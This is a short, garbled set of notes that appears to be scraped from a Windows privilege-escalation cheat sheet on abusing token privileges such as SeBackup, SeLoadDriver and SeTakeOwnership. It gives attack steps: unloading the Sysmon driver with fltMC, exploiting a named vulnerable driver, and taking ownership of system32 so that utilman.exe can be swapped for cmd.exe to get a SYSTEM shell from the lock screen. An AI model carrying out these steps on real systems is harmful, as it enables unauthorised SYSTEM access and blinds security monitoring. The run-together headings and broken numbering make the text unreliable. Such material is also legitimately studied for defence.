SeAssignPrimaryToken
SeBackup
robocopy /b
SeBackupPrivilege
(and robocopy) is not helpful when it comes to open files.
- Robocopy requires both SeBackup and SeRestore to work with /b parameter.SeCreateToken
NtCreateToken
.SeLoadDriver
szkg64.sys
2. Exploit the driver vulnerability
Alternatively, the privilege may be used to unload security-related drivers with ftlMC
builtin command. i.e.: fltMC sysmondrv
szkg64
vulnerability is listed as CVE-2018-15732
2. The szkg64
exploit code was created by Parvez AnwarSeRestore
SeTakeOwnership
takeown.exe /f "%windir%\system32"
2. icalcs.exe "%windir%\system32" /grant "%username%":F
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+USeTcb